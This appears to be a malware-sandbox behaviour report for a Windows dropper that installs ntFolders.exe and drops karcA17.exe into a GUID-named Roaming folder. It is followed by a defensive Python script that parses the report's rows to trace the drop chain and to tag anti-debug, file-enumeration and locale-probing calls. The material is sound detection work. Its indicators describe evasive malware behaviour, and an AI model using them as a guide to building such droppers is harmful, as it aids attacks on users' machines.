Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax |
0_2_00407E89 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004042AA push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00408B24 push 00408B57h; ret |
0_2_00408B4F |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404327 push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040438C push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00409B70 push 00409BADh; ret |
1_2_00409BA5 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040A257 push ds; ret |
1_2_0040A258 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00478210 push 004782BBh; ret |
1_2_004782B3 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040A22B push ds; ret |
1_2_0040A255 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax |
1_2_004063C9 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax |
1_2_004303A9 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax |
1_2_0045A751 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx |
1_2_004108ED |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00412B40 push 00412BA3h; ret |
1_2_00412B9B |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00450FF8 push 0045102Bh; ret |
1_2_00451023 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx |
1_2_0040D242 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004055BD push eax; ret |
1_2_004055F9 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx |
1_2_00443664 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040568D push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx |
1_2_0047976D |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040570E push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004057F0 push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040578B push 00405899h; ret |
1_2_00405891 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx |
1_2_0040F7A2 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx |
1_2_00419E45 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004311AD push esi; ret |
2_2_004311B6 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040F4BB push ecx; ret |
2_2_0040F4CE |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\is-K96P8.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_iscrypt.dll |
Source: C:\Users\user\Desktop\file.exe |
File created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
1_2_00423E24 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus, |
1_2_004243F4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004243AC IsIconic,SetActiveWindow, |
1_2_004243AC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, |
1_2_0041859C |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, |
1_2_00422A74 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004177B0 IsIconic,GetCapture, |
1_2_004177B0 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, |
1_2_00477D2C |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00417EE6 IsIconic,SetWindowPos, |
1_2_00417EE6 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, |
1_2_00417EE8 |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-K96P8.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0046C770 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_00474708 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00451554 FindFirstFileA,GetLastError, |
1_2_00451554 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose, |
1_2_0048A778 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_004729D4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0045CA54 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, |
1_2_00406FEC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DB60 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DEF4 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00423E2D FindFirstFileExW, |
2_2_00423E2D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000959D FindFirstFileExW, |
2_2_1000959D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] |
2_2_0044028F |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] |
2_2_0042041F |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] |
2_2_004429E7 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] |
2_2_00417BAF |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] |
2_2_100091C7 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] |
2_2_10006CE1 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040F789 SetUnhandledExceptionFilter, |
2_2_0040F789 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_0041336B |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_0040F5F5 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
2_2_0040EBD2 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_10006180 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
2_2_100035DF |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_10003AD4 |
Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: Program Manager |
Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: F.program managerv |
Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: program manager |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoA, |
0_2_004051C8 |
Source: C:\Users\user\Desktop\file.exe |
Code function: GetLocaleInfoA, |
0_2_00405214 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: GetLocaleInfoA, |
1_2_0040874C |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: GetLocaleInfoA, |
1_2_00408798 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, |
2_2_00404D40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_00427041 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_0042708C |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_00427127 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
2_2_004271B2 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: EnumSystemLocalesW, |
2_2_0041E2FF |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW, |
2_2_00427405 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
2_2_0042752B |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW, |
2_2_00427631 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
2_2_00427700 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetLocaleInfoW, |
2_2_0041E821 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
2_2_00426D9F |
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
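The rows above are a flattened export of the sandbox report's behaviour tables: a source process, one observation, and a reference (a function id or a "Jump to ..." link). What follows is an added Python example, not part of the report or of the sample being analysed, that parses rows in exactly that shape and does the triage a reader would otherwise do by hand: it rebuilds the drop chain file.exe -> is-I19BM.tmp -> ntFolders.exe -> karcA17.exe from the "File created" rows, lists PEs that were written but never started, and tags "Code function" rows by the API markers the report surfaces (IsDebuggerPresent and the `fs:[00000030h]` read, which is the 32-bit TEB slot holding the PEB pointer, as anti-debug; FindFirstFile* as file enumeration; GetLocaleInfo/EnumSystemLocales as locale probing). The sample rows are copied from the report; the tag names and the "GUID-named folder under Roaming is worth a second look" heuristic are my assumptions, not report findings.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied from the report above (8 records).
SAMPLE = r"""
Source: C:\Users\user\Desktop\file.exe |
File created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Jump to dropped file |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe |
Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) |
Jump to dropped file |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] |
2_2_0044028F |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
2_2_0041336B |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer, |
2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, |
2_2_00404D40 |
""".strip()

FILE_CREATED = "File created: "
NOT_STARTED = "Dropped PE file which has not been started: "
CODE_FUNC = "Code function: "
FUNC_ADDR = re.compile(r"^(\d+_\d+_[0-9A-Fa-f]{8})\s+(.*)$")
# Heuristic (assumption, not a report finding): a GUID-named Roaming folder.
GUID_DIR = re.compile(r"\\AppData\\Roaming\\\{[0-9a-f-]{36}\}\\", re.IGNORECASE)
# fs:[30h] is the PEB pointer in the 32-bit TEB; reading it by hand is how
# BeingDebugged / NtGlobalFlag get checked without calling IsDebuggerPresent.
API_TAGS = {
    "anti-debug": ("IsDebuggerPresent", "fs:[00000030h]"),
    "file-enum": ("FindFirstFileA", "FindFirstFileExW"),
    "locale-probe": ("GetLocaleInfoA", "GetLocaleInfoW", "EnumSystemLocalesW"),
}

def parse_rows(text):
    """Group 'Source / detail / reference' line triples into records."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().rstrip("|").rstrip()
        if not line:
            continue
        if line.startswith("Source: "):
            cur = {"source": line[len("Source: "):], "detail": "", "ref": ""}
            records.append(cur)
        elif cur and not cur["detail"]:
            cur["detail"] = line
        elif cur:
            cur["ref"] = line
    return records

def drop_chain(records, path):
    """Follow 'File created' edges from a dropped file back to the sample."""
    parent = {r["detail"][len(FILE_CREATED):]: r["source"]
              for r in records if r["detail"].startswith(FILE_CREATED)}
    chain = [path]
    while chain[-1] in parent and parent[chain[-1]] not in chain:
        chain.append(parent[chain[-1]])
    return chain[::-1]

def suspicious_drops(records):
    """Dropped paths that land in a GUID-named Roaming folder (heuristic)."""
    return [r["detail"][len(FILE_CREATED):] for r in records
            if r["detail"].startswith(FILE_CREATED) and GUID_DIR.search(r["detail"])]

def unstarted_drops(records):
    """PE files the sandbox saw written but never executed."""
    return [r["detail"][len(NOT_STARTED):] for r in records
            if r["detail"].startswith(NOT_STARTED)]

def tag_code_functions(records):
    """Return {source: {tag: [function ids]}} built from Code-function rows."""
    out = defaultdict(lambda: defaultdict(list))
    for r in records:
        if not r["detail"].startswith(CODE_FUNC):
            continue
        body = r["detail"][len(CODE_FUNC):]
        m = FUNC_ADDR.match(body)
        # Rows without an inline address carry the id in the reference line.
        func_id, apis = (m.group(1), m.group(2)) if m else (r["ref"], body)
        for tag, markers in API_TAGS.items():
            if any(mk in apis for mk in markers):
                out[r["source"]][tag].append(func_id)
    return {src: dict(tags) for src, tags in out.items()}

if __name__ == "__main__":
    recs = parse_rows(SAMPLE)
    for path in suspicious_drops(recs):
        print("suspicious drop chain:", " -> ".join(drop_chain(recs, path)))
    print("dropped but never started:", unstarted_drops(recs))
    print(tag_code_functions(recs))
```

Running it on the full report export instead of the embedded sample is a matter of passing the file's text to `parse_rows`; the chain walk stops on a cycle so a process that rewrites its own dropper cannot loop it. Note that the anti-debug and SetErrorMode(FAILCRITICALERRORS | NOOPENFILEERRORBOX) rows alone are weak signals, since installer and CRT start-up code emits the same chains; the drop into a GUID-named Roaming folder by the installed application is the row that deserves the follow-up.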